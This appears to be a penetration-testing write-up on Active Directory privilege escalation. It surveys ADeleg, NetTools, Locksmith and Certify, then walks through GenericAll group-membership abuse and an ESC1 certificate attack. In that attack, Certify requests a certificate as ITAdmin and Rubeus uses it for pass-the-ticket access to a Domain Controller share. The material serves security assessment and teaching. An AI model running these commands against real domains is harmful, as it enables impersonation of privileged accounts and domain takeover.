Internal Active Directory Attack

Introduction

This report highlights several Active Directory attack techniques that can be used to identify and exploit privilege escalation opportunities within a domain.

• Control Path Analysis — Identifying attack paths and privilege relationships.
• Certificate Abuse (AD CS) — Exploiting certificate service misconfigurations.
• Privilege Escalation — Gaining elevated privileges through Active Directory weaknesses.

##ADeleg.exe

ADeleg.exe is a specialized tool used to analyze and audit Active Directory Delegations and Access Control Lists (ACLs). Unlike exploitation-focused tools such as BloodHound or Certipy, ADeleg is primarily designed to identify delegated permissions and non-default ACL configurations that may introduce security risks or lead to privilege escalation opportunities within the Active Directory environment.

Key Capabilities

• Identifying users and groups with unexpected or excessive permissions.
• Reviewing delegated permissions on Organizational Units (OUs), users, and groups.
• Discovering potentially dangerous permissions, including:
• WriteDACL
• WriteOwner
• GenericAll
• GenericWrite
• Reset Password permissions

Relationship to Control Path Analysis

ADeleg is highly effective at identifying risky ACLs and delegated permissions, while BloodHound excels at visualizing complete attack paths across the Active Directory environment.

These tools are often used together:

• BloodHound → Identifies and maps attack paths.
• ADeleg → Provides detailed visibility into the ACLs and delegated permissions responsible for those paths.

Commands

Display help information:

ADeleg.exe -h

ADeleg.exe -h

Export findings to a CSV file:

ADeleg.exe --csv ADelegOutput.csv

ADeleg.exe --csv ADelegOutput.csv

The exported results can then be reviewed and filtered to identify potentially dangerous permissions and privilege escalation opportunities.

Source

The tool is available as an open-source project on GitHub.

##NetTools

NetTools is a Windows-based Active Directory enumeration and administration tool used to gather information about domain objects, network services, and security-related configurations. It provides a graphical interface that simplifies Active Directory reconnaissance and helps identify potential attack paths and security weaknesses.

Key Capabilities

• Enumerating domain users, groups, and computers.
• Querying Active Directory objects and attributes.
• Reviewing group memberships and delegated permissions.
• Identifying domain and forest trust relationships.
• Gathering information from LDAP, DNS, SMB, and other network services.
• Assisting in the discovery of privilege escalation opportunities.

Role in Active Directory Assessments

NetTools is commonly used during the enumeration phase of an Active Directory assessment. It helps security professionals collect detailed information about the environment and identify areas that require further investigation.

These findings can be leveraged to:

• Understand the Active Directory structure.
• Identify privileged accounts and groups.
• Discover trust relationships.
• Locate potential attack paths.
• Support privilege escalation analysis.

Source

The tool is available as an open-source project on GitHub.

##Locksmith

Locksmith is an Active Directory Certificate Services (AD CS) assessment tool designed to identify and report certificate-related misconfigurations that could be abused by attackers. The tool focuses on detecting insecure certificate templates, enrollment permissions, and other weaknesses associated with certificate-based authentication.

Key Capabilities

• Identifying vulnerable AD CS configurations.
• Detecting insecure certificate templates.
• Reviewing enrollment and issuance permissions.
• Discovering common AD CS misconfigurations associated with ESC attack paths.
• Highlighting certificate abuse opportunities that may lead to privilege escalation.

Role in Active Directory Assessments

Locksmith is commonly used during AD CS security assessments to evaluate the security posture of certificate services within the domain. The tool helps identify weaknesses that could allow attackers to request certificates, impersonate privileged users, or gain unauthorized access through certificate-based authentication.

These findings can be leveraged to:

• Identify certificate abuse opportunities.
• Assess AD CS security risks.
• Support privilege escalation analysis.
• Improve certificate service hardening efforts.

Source

The tool is available as an open-source project on GitHub.

One common Active Directory privilege escalation scenario involves abusing the GenericAll permission on a group object. Since GenericAll grants full control over the target object, an attacker can modify its attributes, including group membership.

In this example, the membership of the "Template Managers" group was first reviewed using the following command:

Get-ADGroup "Template Managers" -Properties Members | Select-Object -ExpandProperty Members

Get-ADGroup "Template Managers" -Properties Members | Select-Object -ExpandProperty Members

A user account with GenericAll permissions over the group then added the user Suzie to the group:

Add-ADGroupMember -Identity "Template Managers" -Members "Suzie" -ErrorAction SilentlyContinue

Add-ADGroupMember -Identity "Template Managers" -Members "Suzie" -ErrorAction SilentlyContinue

The group membership was verified afterward to confirm that the modification was successful:

Get-ADGroup "Template Managers" -Properties Members | Select-Object -ExpandProperty Members

Get-ADGroup "Template Managers" -Properties Members | Select-Object -ExpandProperty Members

Finally, the affected user was required to log off and log back on (or use runas) to refresh the security token and obtain the privileges associated with the new group membership.

##Certify.exe

Certify.exe is an Active Directory Certificate Services (AD CS) assessment tool developed by SpecterOps. It is used to enumerate certificate infrastructure, identify misconfigured or vulnerable certificate templates, and detect potential certificate-based attack paths in a domain.

Key Capabilities

• Enumerates AD CS components like Certificate Authorities (CAs)
• Discovers and analyzes certificate templates
• Identifies insecure or exploitable configurations
• Helps detect privilege escalation paths via certificates

Role in AD Assessments

Certify is mainly used during the enumeration phase to understand how certificate services are configured and where weaknesses exist. It helps security testers map attack paths related to AD CS.

Certificate Abuse

If a vulnerable template is found, an attacker may be able to request a certificate that can be used to impersonate other users, including privileged accounts.

Security Impact

• Misconfigured certificate template abuse
• User or admin impersonation
• Privilege escalation
• Potential persistence using issued certificates

First, the attacker enumerates AD CS to find vulnerable templates:

./Certify1.exe find /showallpermissions

./Certify1.exe find /showallpermissions

This command lists all certificate templates and their permissions to identify weak or over-permissive access (who can enroll or modify templates).

After identifying a vulnerable template like webserver2026, the attacker checks or uses it:

./Certify2.exe manage-template --template webserver2026 --supply-subject --client-auth

./Certify2.exe manage-template --template webserver2026 --supply-subject --client-auth

• --template webserver2026 → selects the target certificate template
• --supply-subject → allows the attacker to choose another user's identity
• --client-auth → enables the certificate for authentication

If the template is misconfigured, the attacker can request a certificate that can be used to authenticate as another user in the domain.

Enumerate Certificate Authorities

First, identify the available Certificate Authorities (CAs) in the domain:

.\Certify1.exe find cas

.\Certify1.exe find cas

Purpose

• Lists all Enterprise Certificate Authorities.
• Identifies the correct CA name required when requesting a certificate.

Obtain the Target User SID

Next, retrieve the SID of the privileged account:

(Get-ADUser ITAdmin -Properties objectSID | Select -ExpandProperty objectSID).Value

(Get-ADUser ITAdmin -Properties objectSID | Select -ExpandProperty objectSID).Value

Purpose

• Retrieves the Security Identifier (SID) for the ITAdmin account.
• The SID may be required for certificate mapping and validation in some environments.

Request a Certificate as ITAdmin

After identifying a vulnerable template (Webserver2026), request a certificate while specifying the target user's UPN:

.\Certify2.exe request -ca "Eureka-ADCS01.eureka.local\EUREKA-ADCS01-CA" -template Webserver2026 -upn ITAdmin

.\Certify2.exe request -ca "Eureka-ADCS01.eureka.local\EUREKA-ADCS01-CA" -template Webserver2026 -upn ITAdmin

Parameters

• -ca → Specifies the target Certificate Authority.
• -template Webserver2026 → Selects the vulnerable certificate template.
• -upn ITAdmin → Requests a certificate containing the UPN of the privileged user.

Purpose

• If the template allows the requester to supply subject information (ESC1 condition), a certificate can be issued that represents the ITAdmin account.
• The issued certificate can later be used for authentication as that user.

Save the Issued Certificate

After the certificate is issued, copy the Base64 certificate blob returned by Certify.

Purpose

• Preserves the certificate for later authentication.
• Provides evidence of successful certificate issuance.

Request a Kerberos TGT Using the Certificate

Use the issued certificate with Rubeus to obtain a Kerberos Ticket Granting Ticket (TGT):

.\Rubeus.exe asktgt /user:ITAdmin /ptt /certificate:<certificate_blob>

.\Rubeus.exe asktgt /user:ITAdmin /ptt /certificate:<certificate_blob>

Parameters

• /user:ITAdmin → Target account to authenticate as.
• /certificate → The certificate obtained from the vulnerable template.
• /ptt → Pass-The-Ticket; injects the TGT into the current session.

Purpose

• Performs certificate-based Kerberos authentication (PKINIT).
• Requests a TGT for the ITAdmin account.
• Loads the ticket into the current logon session.

Verify Access

Test access to the Domain Controller administrative share:

dir \\Eureka-DC01\c$

dir \\Eureka-DC01\c$

Purpose

• Verifies that the Kerberos ticket is valid.
• Confirms that authentication as ITAdmin was successful.
• Demonstrates access to resources available to the privileged account.

Summary

This assessment identified Active Directory privilege escalation opportunities through delegated permissions and AD CS misconfigurations. ADeleg, NetTools, Locksmith, and Certify were used to enumerate the environment, identify security weaknesses, and demonstrate abuse scenarios including GenericAll group membership modification and ESC1 certificate-based impersonation of privileged users.